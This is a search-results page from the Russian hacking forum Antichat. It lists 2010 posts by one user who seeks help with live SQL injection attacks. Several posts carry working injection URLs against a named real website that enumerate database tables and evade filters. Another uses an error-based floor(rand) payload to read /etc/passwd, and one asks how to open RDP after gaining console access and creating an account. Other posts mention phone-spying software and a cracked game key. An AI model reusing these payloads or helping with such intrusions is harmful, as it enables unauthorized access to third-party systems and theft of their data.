ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Вернуться   Форум АНТИЧАТ > Поиск по форуму
Показано с 1 по 25 из 275.
На поиск затрачено 0.01 сек.
Поиск: Сообщения от: YuNi|[c
Раздел: Уязвимости 24.05.2010, 13:56
Ответов: 13,923
Просмотров: 585,197
Автор YuNi|[c
тут какая то неполадка. Я регал мейл kvadimex но...

тут какая то неполадка. Я регал мейл kvadimex но не могу найти в базе этот мейл((. Подскажите как делать запрос тут. like '%email%' прошло в поиске таблицы с мейлом но like '%kvadimex%' не работает
Раздел: Уязвимости 23.05.2010, 23:41
Ответов: 13,923
Просмотров: 585,197
Автор YuNi|[c
ну статьи то читаю просто этот фильтр меня...

ну статьи то читаю просто этот фильтр меня немного перепутал
Раздел: Уязвимости 23.05.2010, 22:43
Ответов: 13,923
Просмотров: 585,197
Автор YuNi|[c
спс, как я понял тут нельзя выводит инфо именно с...

спс, как я понял тут нельзя выводит инфо именно с определеной бд(SH_users)
Раздел: Уязвимости 23.05.2010, 22:36
Ответов: 13,923
Просмотров: 585,197
Автор YuNi|[c
хмм. вроде ругается Microsoft OLE DB Provider...

хмм. вроде ругается
Microsoft OLE DB Provider for SQL Server error '80040e14' 'group_concat' is not a recognized built-in function name.
/adredirect.asp, line 23
я уже знаю имена всех...
Раздел: Уязвимости 23.05.2010, 22:26
Ответов: 13,923
Просмотров: 585,197
Автор YuNi|[c
если бы where помогло не писал бы тут(( вот ...

если бы where помогло не писал бы тут((

вот
http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables+where+table_schema='SH_users')--

ADODB.Field...
Раздел: Уязвимости 23.05.2010, 21:52
Ответов: 13,923
Просмотров: 585,197
Автор YuNi|[c
спс прошло, но тут как можно выводит инфо с...

спс прошло, но тут как можно выводит инфо с соседных бд а не с текушего?

http://www.stockhouse.com/adredirect.asp?sid=(select/**/top+1+table_name+from+information_schema.tables)--
выводит таблицу...
Раздел: Чужие Статьи 22.05.2010, 02:14
Ответов: 9
Просмотров: 518
Автор YuNi|[c
помоему новый фф намного быстрее чем опера, хотя...

помоему новый фф намного быстрее чем опера, хотя я юзаю обеих. Просто уже зачемаю разницу в скорости. Насчет хром незнаю не юзал, что хром пашет быстрее чем опера и фф?
Раздел: Уязвимости 21.05.2010, 23:24
Ответов: 13,923
Просмотров: 585,197
Автор YuNi|[c
собсно вот сам ресурс: ...

собсно вот сам ресурс:

http://www.stockhouse.com/adredirect.asp?sid=7385+or+1=(SELselectECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
на без топ ругается на table_name :(
Раздел: Уязвимости 21.05.2010, 23:17
Ответов: 13,923
Просмотров: 585,197
Автор YuNi|[c
пробовал...

пробовал 1+or+1=(/*!SELECT*/+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--


Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'TOP'. ...
Раздел: Уязвимости 21.05.2010, 21:09
Ответов: 13,923
Просмотров: 585,197
Автор YuNi|[c
привет, тут у меня вопрос по mssql inj ...

привет, тут у меня вопрос по mssql inj

http://www.site.com/script.asp?id=convert(int,@@version COLLATE SQL_Latin1_General_Cp1254_CS_AS)--

Sql Version: Microsoft SQL Server 2005 - 9.00.3042.00...
Раздел: Избранное 17.05.2010, 00:35
Ответов: 223
Просмотров: 78,102
Автор YuNi|[c
чет вышел уже хавий 1.09 версия с поддержкой...

чет вышел уже хавий 1.09 версия с поддержкой вывода через ошибок но наш сипт5 задерживается
Раздел: Сотовый фрикинг 10.05.2010, 13:48
Ответов: 28
Просмотров: 7,158
Автор YuNi|[c
видно что статья уже постарел. шас есть новая...

видно что статья уже постарел. шас есть новая прога который всё делает сам тоесть все в одном.
не буду тут написать про что может сделать, но в гугле набираем SkyeSpy

лан залил то что у меня...
Раздел: PHP, PERL, MySQL, JavaScript 08.05.2010, 02:39
Ответов: 247
Просмотров: 15,383
Автор YuNi|[c
да было бы здорово если пашкела реализует функцию...

да было бы здорово если пашкела реализует функцию инжекта через куки и хедер
Раздел: Квесты 04.05.2010, 05:36
Ответов: 11
Просмотров: 4,618
Автор YuNi|[c
хмм год назад скардил Untold и норм работал а...

хмм год назад скардил Untold и норм работал а теперь ключ не пашет, попробовал ваш метод тоже не пашет ((
Раздел: PHP, PERL, MySQL, JavaScript 04.05.2010, 03:44
Ответов: 247
Просмотров: 15,383
Автор YuNi|[c
ну я просто поменяю местами параметры и поставлю...

ну я просто поменяю местами параметры и поставлю в конец уязвимый параметр и всё ))

при твоем условиии так
www.pupkin.com/index.php?param2=13&param1=1+union+select+1,2,3--+

пашет как на...
Раздел: Уязвимости 01.05.2010, 12:22
Ответов: 13,923
Просмотров: 585,197
Автор YuNi|[c
есть доступ к консоли машины через скул. Вопрос...

есть доступ к консоли машины через скул. Вопрос можно ли открыть там порт для рдп? Я создал учетку но коннект нету вообше.
Раздел: Уязвимости 30.04.2010, 11:40
Ответов: 13,923
Просмотров: 585,197
Автор YuNi|[c
спс за ответ но не очень то понял тебя, в каких...

спс за ответ но не очень то понял тебя, в каких условиях гриш? Судя по запросу оно должно дополнят мой запрос? Хотя так не пашет
Раздел: Уязвимости 30.04.2010, 03:27
Ответов: 13,923
Просмотров: 585,197
Автор YuNi|[c
есть вопрос насчет floor сделал запрос чтоб...

есть вопрос насчет floor

сделал запрос чтоб прочест файли на сервере:
and (select 1 from (select count(0),concat((select+substring(load_file('/etc/passwd'),1,50) LIMIT 0,1),floor(rand(0)*3))...
Раздел: Авторские статьи 29.04.2010, 23:15
Ответов: 34
Просмотров: 12,386
Автор YuNi|[c
Уважаемые профи, спс за ваши усилия в развитии...

Уважаемые профи, спс за ваши усилия в развитии новых методов. Вот все прекрасно обьяснили, но как то никто не прояснил про load_file через floor rand и name_const

Сегодня было дело прочест файли...
Раздел: PHP, PERL, MySQL, JavaScript 29.04.2010, 10:29
Ответов: 247
Просмотров: 15,383
Автор YuNi|[c
pashkela бро тулза прекрасно справляется со своей...

pashkela бро тулза прекрасно справляется со своей задачей респект. Если сможеш добав функцию чтоб инжектил и на Header. Чтоб можно было свою дополнитую хедер добавит с инжектом. Много скули на хедере...
Раздел: Уязвимости 27.04.2010, 01:28
Ответов: 13,923
Просмотров: 585,197
Автор YuNi|[c
может подскажет наши профи насчет моего вопроса?

может подскажет наши профи насчет моего вопроса?
Раздел: Уязвимости 25.04.2010, 21:44
Ответов: 13,923
Просмотров: 585,197
Автор YuNi|[c
нет версию и дбнайм я сам смогу взят но кто нит...

нет версию и дбнайм я сам смогу взят но кто нит подскажите как далше вывести имена таблиц и колонок
Раздел: Уязвимости 24.04.2010, 09:59
Ответов: 13,923
Просмотров: 585,197
Автор YuNi|[c
ну знаю что может быть фильтрация но я основном...

ну знаю что может быть фильтрация но я основном мучаюс что не могу составит правильный запрос с таким типам скуля. Ну стандартные вроде знаю но тут метод Qwazar как то не очень то гоняю. Попробовал...
Раздел: Уязвимости 24.04.2010, 06:29
Ответов: 13,923
Просмотров: 585,197
Автор YuNi|[c
народ прошу помоши в раскрутке через floor rand ...

народ прошу помоши в раскрутке через floor rand

вот версию и др инфо выводится норм но вот никак не могу выводит именя таблиц и колонок.
_http://www.le ve lst oc...
Раздел: Уязвимости 20.04.2010, 22:34
Ответов: 13,923
Просмотров: 585,197
Автор YuNi|[c
спс попугай но все еще остался now()) You...

спс попугай но все еще остался now())

You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '', now())' at line 2
Показано с 1 по 25 из 275.

 
Быстрый переход




ANTICHAT.XYZ